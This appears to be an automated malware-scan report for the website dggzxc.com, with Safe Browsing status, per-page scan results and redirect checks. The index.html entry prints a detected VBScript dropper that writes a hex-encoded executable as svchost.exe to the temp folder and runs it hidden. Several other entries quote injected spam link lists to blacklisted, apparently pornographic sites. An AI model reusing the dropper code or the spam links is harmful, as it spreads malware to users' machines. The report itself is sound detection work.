Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dggzxc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dggzxc.com/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:19 GMT Accept-Ranges: bytes ETag: "bcd33538a323d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 124434 Content-Location: http://dggzxc.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 20:08:32 GMT | clean |
http://dggzxc.com/index.html | 200 OK Content-Length: 124434 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://float2006.tq.cn/floatcard?adminid=8756326&sort=1 | 200 OK Content-Length: 5072 Content-Type: application/x-javascript | clean |
http://dggzxc.com/fenrui/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:25 GMT Accept-Ranges: bytes ETag: "c6187e3a4934d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142150 Content-Location: http://dggzxc.com/fenrui/index.html Content-Type: text/html Last-Modified: Tue, 20 Jan 2015 00:37:11 GMT | clean |
http://dggzxc.com/fenrui/index.html | 200 OK Content-Length: 142150 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jhbwx.com ...[1464 bytes skipped]... <ul><li><a href="http://bjygm88.com/calvv/">ҹĻϵÄÉϺ£Ì²ÕÔá°</a></li> <li><a href="http://qncjfs.com/burberry/">90ºóУ԰ÃÀÅ®¸ßÇå</a></li> <li><a href="http://ybtzdb.com/burberry/">sldao4.com</a></li> <li><a href="http://xiaoshuo609.com/customer/">é©×</a></li> <li><a href="http://jhbwx.com/comcontent/">hp¶¯»Æ¬.3gp</a></li> <li><a href="http://scgqt.com/tedelon/">Öйúballbusting</a></li> <li><a href="http://swanhu.com/fotuyt/">Ò¯Ò¯µÄŨ¾«ÉÙÅ®</a></li> <li><a href="http://hljtytm.com/chiujy/">ÃÃÃÃÁ½ÍȼäµÄ</a></li> <li><a href="http://symaoyi.com/chanel/">´ºÅ¯v»¨¿ª</a></li> <li><a href="http://htahj.com/chiujy/">ÎÒ±»´ó²®ÂÖ¼é&l ...[2944 bytes skipped]... | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://dggzxc.com/about/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:29 GMT Accept-Ranges: bytes ETag: "6ab84929c82fd01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141902 Content-Location: http://dggzxc.com/about/index.html Content-Type: text/html Last-Modified: Wed, 14 Jan 2015 07:03:12 GMT | clean |
http://dggzxc.com/about/index.html | 200 OK Content-Length: 141902 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: net138.net ...[1056 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://net138.net/list/">Å®ÐÔÂãÌå»Æͼ</a></li> <li><a href="http://jzmmc.cn/build/">ÅËçâ°ØÎ人Ñݳª»á</a></li> <li><a href="http://xltoup.com/burberry/">Éñ½£ÇéÌì1ͼÎĹ¥ÂÔ</a></li> <li><a href="http://koregg.com/guccii/">ÔõôÓÿ첥¿´3dµçÓ°</a></li> <li><a href="http://xzjctx.com/egou/">ÈÕ±¾ÉÙ¸¾ÂÒÂ×ͼƬ</a></li> <li><a href="http://xzjctx.com/trades/">Ãâ·Ñ×ÊÔ ...[3360 bytes skipped]... | ||
http://dggzxc.com/html/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:35 GMT Accept-Ranges: bytes ETag: "6a664d4ea30d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142374 Content-Location: http://dggzxc.com/html/index.html Content-Type: text/html Last-Modified: Thu, 15 Jan 2015 17:38:04 GMT | clean |
http://dggzxc.com/html/index.html | 200 OK Content-Length: 142374 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: nxjmjz.com ...[1055 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://nxjmjz.com/project/">³ÉÈËÈËÌåÒÕÊõÕÕƬ</a></li> <li><a href="http://hongfei.net.cn/calvv/">00kkk²¥·ÅÆ÷,13ËêÓ×ɫӰƬ</a></li> <li><a href="http://happigoo.cn/lean/">Ò»°ã´¢ÐîÇãÏò</a></li> <li><a href="http://fyhxbz.com/huasuo/">Å®¶ù±¨´ð¸¸Ç×·þÎñ</a></li> <li><a href="http://ylstny.com/aspcms/">rrr 17.c o m</a></li> <li><a href="http://bjbyhj.com/fenrui/"&g ...[3392 bytes skipped]... | ||
http://dggzxc.com/chanpin/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:41 GMT Accept-Ranges: bytes ETag: "88e5021332d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142272 Content-Location: http://dggzxc.com/chanpin/index.html Content-Type: text/html Last-Modified: Sat, 17 Jan 2015 05:04:01 GMT | clean |
http://dggzxc.com/chanpin/index.html | 200 OK Content-Length: 142272 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: rsbwcl.com ...[1247 bytes skipped]... /> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://qncjfs.com/html/">www38jj38jjco...</a></li> <li><a href="http://nxtxjs.com/prada/">dyzg.net baidu.con</a></li> <li><a href="http://rsbwcl.com/news_cn/">»ðÓ°ÈÌÕßÃùÈËСӣh</a></li> <li><a href="http://hhzg288.com/gswh/">º«¹ú °®Óë×ï</a></li> <li><a href="http://wnsss.com/case/">www55rk</a></li> <li><a href="http://qhdzpw.cn/merssdc/">sldao.net</a></li> <li><a href="http://syhzzh.com/chanel/">ÐÂÃÜ</a></li> <li><a href="http://jhuic.com/lieres/">haoie.com 1 0 0 0 1 0 0 1 1 2012-7-5 ...[3188 bytes skipped]... | ||
http://dggzxc.com/news_cn/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:44 GMT Accept-Ranges: bytes ETag: "1a1029bb3233d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142797 Content-Location: http://dggzxc.com/news_cn/index.html Content-Type: text/html Last-Modified: Sun, 18 Jan 2015 15:23:37 GMT | clean |
http://dggzxc.com/news_cn/index.html | 200 OK Content-Length: 142797 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hm800.net ...[1069 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://hm800.net/news_cn/">»ÆÉ«AƬÈý¼¶Æ¬ÈÕ±¾µÄ</a></li> <li><a href="http://ymjgzn.com/chiujy/">°®ÇéÈËÍøͬ³Ç½»ÓÑÍøÕ¾</a></li> <li><a href="http://hljlwe.com/culture/">¸ßɽÁ÷Ë®zhi fu</a></li> <li><a href="http://nxjmjz.com/newslist/">ÌÇÀ࿹Ôca199</a></li> <li><a href="http://apace.cc/lieres/">¹òÇó»ÆÉ«ÍøÕ¾µçÓ°</a></li> <li><a href="http://jxyffz.cn/umblist/"& ...[3342 bytes skipped]... | ||
http://dggzxc.com/contact/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:49 GMT Accept-Ranges: bytes ETag: "d243161434d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142317 Content-Location: http://dggzxc.com/contact/index.html Content-Type: text/html Last-Modified: Mon, 19 Jan 2015 18:16:46 GMT | clean |
http://dggzxc.com/contact/index.html | 200 OK Content-Length: 142317 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wanren88.com ...[1140 bytes skipped]... ref="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://goufand.com/lean/">bt2ÔÂÐÂƬ</a></li> <li><a href="http://wanren88.com/items/">www.666u</a></li> <li><a href="http://jlsxg.com/develop/">°ì¹«ÖÏ´ó¸ÉÈÕ±¾ÃÀü</a></li> <li><a href="http://rcc1688.cn/rlzy/">»ðÓ°ÈÌÕßÖÐÎÄÍø¹úÓï</a></li> <li><a href="http://sjxy668.cn/egou/">www997ktvcom</a></li> <li><a href="http://shxgmh.com/merssdc/">»¨ÓëÉß¾øÇé°æ</a></li> <li><a href="http://qhjdx.com/tedelon/">www.ady9.netÂ×Àí ...[3295 bytes skipped]... | ||
http://dggzxc.com/guest/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:52 GMT Accept-Ranges: bytes ETag: "fa2e3b7bfb34d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141329 Content-Location: http://dggzxc.com/guest/index.html Content-Type: text/html Last-Modified: Tue, 20 Jan 2015 21:53:10 GMT | clean |
http://dggzxc.com/guest/index.html | 200 OK Content-Length: 141329 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ststgd.com ...[1154 bytes skipped]... ef="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://hzlapd.cn/honor/">É«µÄС˵ͼƬ</a></li> <li><a href="http://ststgd.com/tedelon/">³ÉÈË¿ì²¥ÇéÉ«ÍøÕ¾</a></li> <li><a href="http://ugecity.net/content/">̨ÍåÉ«ÇéÍø´óÈ«</a></li> <li><a href="http://bjjrfz.com/calvv/">ÑdzÉÈËÍø</a></li> <li><a href="http://jzmmc.cn/yves/">ÈËÓë¹·ÔÓ½»ÊÓƵ</a></li> <li><a href="http://facesmap.net/productslist/">Ç¿¼éСŮС˵</a></li> <li><a href="http://rusmans.com/service/">¾ÍÈ¥¸Éb×î ...[3281 bytes skipped]... | ||
http://dggzxc.com/guest/0.html | 200 OK Content-Length: 16897 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: vweilai.com ...[1114 bytes skipped]... >²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://vweilai.com/companys/">ÑÇÖÞÉ«ÇéÃÀѨ</a></li> <li><a href="http://yalishe.cn/productslist/">ÑÇÖÞ´óµ¨Ë½ÒõÒÕÊõ</a></li> <li><a href="http://whztjx.com/gswh/">ÌòÀÏÆŵÄѨ</a></li> <li><a href="http://dggzxc.com/bmbbmw/">Àdzµ Ê«</a></li> <li><a href="http://junanshan.com/huasuo/">cfÃÀÅ®ÁéºüÕßͼƬ</a></li> <li><a href="http://ldgcjd.com/burberry/">½üÇ×½»Î² ...[3156 bytes skipped]... | ||
http://dggzxc.com/bmbbmw/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:30:56 GMT Accept-Ranges: bytes ETag: "3e363dcc1a31d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142451 Content-Location: http://dggzxc.com/bmbbmw/index.html Content-Type: text/html Last-Modified: Thu, 15 Jan 2015 23:27:15 GMT | clean |
http://dggzxc.com/bmbbmw/index.html | 200 OK Content-Length: 142451 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: xgmtjf.com ...[1055 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://xgmtjf.com/fotuyt/">www.uy000.com-Ê×Ò³</a></li> <li><a href="http://cqkrkj.cn/comcontent/">www.1444eee.com</a></li> <li><a href="http://ypdx.net/miun/">¾øÍûÖ÷¸¾µÚÎå¼¾¾çÇé</a></li> <li><a href="http://szjkcy.com/rlzy/">Æ®ÃìÑÞÉñ</a></li> <li><a href="http://cfqczs.com/case/">ÄÐ×ÓƨÑÛ×ÓͼƬ</a></li> <li><a href="http://yuzecheng.com/calvv/">ÈËÌåÐÔÒÕÊõÍ ...[3383 bytes skipped]... | ||
http://dggzxc.com/bmbbmw/0.html | 200 OK Content-Length: 16814 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dgthbxg.com ...[1120 bytes skipped]... >²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://dgthbxg.com/ansiu/">°²×¿ÉÁͼ±ÚÖ½</a></li> <li><a href="http://jinxinlipin.com/htcui/">¼¤ÇéÉ«Çé °Ù¶ÈÓ°Òô</a></li> <li><a href="http://kzhqzjj.com/factory/">ÕÒ¸çºÃ¿´µÄhsµçÓ°ÍøÕ¾</a></li> <li><a href="http://jzmmc.cn/vuiton/">ÙÁºÚÐÉÐɵÄÉúÖ³Æ÷</a></li> <li><a href="http://bytccar.com/louiy/">22szs×îеØÖ·</a></li> <li><a href="http://hnpjjc.com/customer/"& ...[3190 bytes skipped]... | ||
http://dggzxc.com/bmbbmw/1.html | 200 OK Content-Length: 17619 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dgthbxg.com ...[1501 bytes skipped]... t;ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://junanshan.com/gswh/">¶íÂÞ˹Â×ÀíµçÓ°ÔÚÏß</a></li> <li><a href="http://ycpad.cn/htcui/">Å©´åÂÒÇ黶°®Ð¡Ëµtxt</a></li> <li><a href="http://esun1981.cn/rlzy/">2014ÀÇ</a></li> <li><a href="http://yalishe.cn/gswh/">ÈËÓ붯ÎïÐÔ½»ºó</a></li> <li><a href="http://dgthbxg.com/tdeth/">éÙÀæÉ´ÑÇÖÞɫͼ</a></li> <li><a href="http://jhuic.com/veyui/">ÂÒÂ×ÀÏʦÑÞĸ</a></li> <li><a href="http://cqyhcl.com/merssdc/">www.cnrdn.com/</a></li> <li><a href="http://bjbyhj.com/develop/">www.5b5b5b.cm</a></li> <li><a href="http://nlpxxw.com/louiy/">bl¹¤¿ÚС˵</a></li> <li><a href="http://apace.cc/tdeth/">www.543xx.com ¿ì²¥< ...[2594 bytes skipped]... | ||
http://dggzxc.com/guccii/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 03:31:01 GMT Accept-Ranges: bytes ETag: "3a152e7d5132d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141146 Content-Location: http://dggzxc.com/guccii/index.html Content-Type: text/html Last-Modified: Sat, 17 Jan 2015 12:31:16 GMT | clean |
http://dggzxc.com/guccii/index.html | 200 OK Content-Length: 141146 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ahjhaf.com ...[1084 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://ahjhaf.com/comcontent/">ÎҵĽ¿ÆÞ³ÉÁËËûÃÇ °ÙÐÔ¸ó</a></li> <li><a href="http://lexiangyd.com/items/">Å®ÈË·ÖÃä¹ý³ÌÊÓƵ</a></li> <li><a href="http://qhfzstu.net/ktvbg/">3dÈâÆѵçÓ°ÍêÕû°æ²¥·Å</a></li> <li><a href="http://hljlwe.com/items/">1. Ö§³ÖÓû§aƬ¹²Ïí2. ¹úÍâ¸÷ÖÖ½ûƬËÑË÷3. ´óÁ¿³ÉÈËÍøÖ·4. ´óÁ¿¹úÍâ³ÉÈ˵ç̨5. ¸ßËÙ¸ßÇå²¥·Å6. Íò²¿Æ¬µçÓ°ÊÓƵ¸üÐÂ7. Ö§³ÖËÑË÷¸÷À༤ÇéaƬ</a></li> <li><a hre ...[3270 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dggzxc.com
Result:
HTTP/1.1 200 OK
Date: Sat, 31 Jan 2015 03:30:19 GMT
Accept-Ranges: bytes
ETag: "bcd33538a323d01:3c49"
Server: Microsoft-IIS/6.0
Content-Length: 124434
Content-Location: http://dggzxc.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 20:08:32 GMT
...124434 bytes of data.
GET / HTTP/1.1
Host: dggzxc.com
Result:
HTTP/1.1 200 OK
Date: Sat, 31 Jan 2015 03:30:19 GMT
Accept-Ranges: bytes
ETag: "bcd33538a323d01:3c49"
Server: Microsoft-IIS/6.0
Content-Length: 124434
Content-Location: http://dggzxc.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 20:08:32 GMT
...124434 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dggzxc.com
Referer: http://www.google.com/search?q=dggzxc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dggzxc.com
Referer: http://www.google.com/search?q=dggzxc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.